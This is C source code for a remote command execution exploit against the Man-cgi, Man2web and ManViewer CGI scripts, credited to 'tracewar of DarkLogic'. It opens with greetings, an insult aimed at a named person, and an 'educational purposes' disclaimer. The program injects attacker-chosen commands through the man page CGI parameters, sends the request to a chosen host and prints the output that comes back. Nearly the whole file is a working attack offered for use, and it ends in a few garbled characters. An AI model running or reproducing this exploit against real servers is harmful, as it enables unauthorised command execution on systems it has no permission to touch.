/* Multipie man-2-web cgi scripts reomte command execution exploit Exploit coded and bugs found by tracewar of DarkLogic. Greetings goes to: Matan Peretz - Lijojon :-) Ofer Shaked setuid alex majestic - do I know you ? Yacha - Peace. Special greetings to crazy cookie my perfect girlfriend.. Oh yea and a tiny piece of crap goes to [maorbn], dude you suck get some skills loser ;x I don't take any responsibility of what this code may do - the only reason i release this code is for educaional purposes! */ #include #include #include #include #include void usage(char *argv0) { fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n"); fprintf(stderr, "Man-cgi/Man2web/ManViewer Remote Command Execution Exploit\n"); fprintf(stderr, "Exploit coded and bugs found by tracewar of DarkLogic\n"); fprintf(stderr, "tested against:\n[+] Man-cgi 1.11 on RedHat Enterprise Linux AS release 3 (Taroon Update 4)\n"); fprintf(stderr, "[+] Man2web (ALL VERSIONS) - little problem with the cleanup fix it yourself, short \ commands problem\n"); fprintf(stderr, "[+] ManViewer (ALL VERSIONS) - Limited commands\n"); fprintf(stderr, "usage: %s \n", argv0); fprintf(stderr, "targets: 0=Man-cgi 1=man2web 2=Man2html\n"); fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n"); exit(0); } int main(int argc, char **argv) { int sock, i, j; struct sockaddr_in serv_addr; struct hostent *crap; char *cp, dummy[50000], buffer[2000] = "GET "; /* Dummy is huge for the recv() later, I could've used a pointer and malloc everytime the while() loop did the trick ;x You can call me lazy :-) */ if(argc < 6) usage(argv[0]); if(atoi(argv[5]) == 0) { memset(dummy, 0x00, 50000); strcat(dummy, argv[3]); strcat(dummy, "?-P "); strcat(dummy, argv[2]); strcat(dummy, " ls"); } else if(atoi(argv[5]) == 1) { memset(dummy, 0x00, 50000); strcat(dummy, argv[3]); strcat(dummy, "?program=-P "); strcat(dummy, argv[2]); strcat(dummy, " ls"); } else if(atoi(argv[5]) == 2) { memset(dummy, 0x00, 50000); strcat(dummy, argv[3]); strcat(dummy, "?section=-P"); strcat(dummy, argv[2]); strcat(dummy, "&topic=w"); } else usage(argv[0]); printf("[+] Made our evil buffer switching spaces with %20 and requesting..\n"); for(i=0, j=4;i < strlen(dummy);i++) { if(dummy[i] == ' ') { strcat(buffer, "%20"); j+=3; } else { buffer[j] = dummy[i]; j++; } } strcat(buffer, "\r\n"); sock = socket(AF_INET, SOCK_STREAM, 0); if(sock < 0) return printf("[-] Error creating socket.\n"); crap = gethostbyname(argv[1]); if(crap == NULL) return printf("[-] Cant resolve the specified hostname: %s\n", argv[1]); else printf("[+] Resolved the remote hostname, connecting...\n"); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(atoi(argv[4])); bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length); if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0) return printf("[-] Error connecting to %s:%d\n", argv[1], atoi(argv[3])); printf("[+] Connected! sending our evil request... "); if( (send(sock, buffer, strlen(buffer), 0)) == -1 ) return printf("\n[-] Error sending the evil request :(\n"); printf("Sent!\n"); printf("[+] Waiting for the server answer...\n"); memset(buffer, 0x00, 2000); memset(dummy, 0x00, 50000); printf("[+] Got:\n\n"); while(recv(sock, buffer, 2000, 0) > 0) strcat(dummy, buffer); cp = &dummy[0]; i = 0; /* Bahhh this filtering sucks ass, you can clean this alot */ if(atoi(argv[5]) == 0) { while(strncmp(cp, "

", 4)) { cp++; i++; } cp+=4; while(strncmp(cp, "

", 4) && strncmp(cp, "", 5)) { cp++; i++; } cp+=4; while(strncmp(cp, "pre", 3)) cp++; *cp = '\0'; cp = &dummy[0] + i + 6; } else if(atoi(argv[5]) == 2) { while(strncmp(cp, "PRE", 3)) { cp++; i++; } cp+=2; while(strncmp(cp, "PRE", 3)) cp++; *cp = '\0'; cp = &dummy[0] + i + 2; } printf("%s", cp); printf("\n\n"); printf("[+] Good Bye!\n"); close(sock); return 0; }

��ŷ��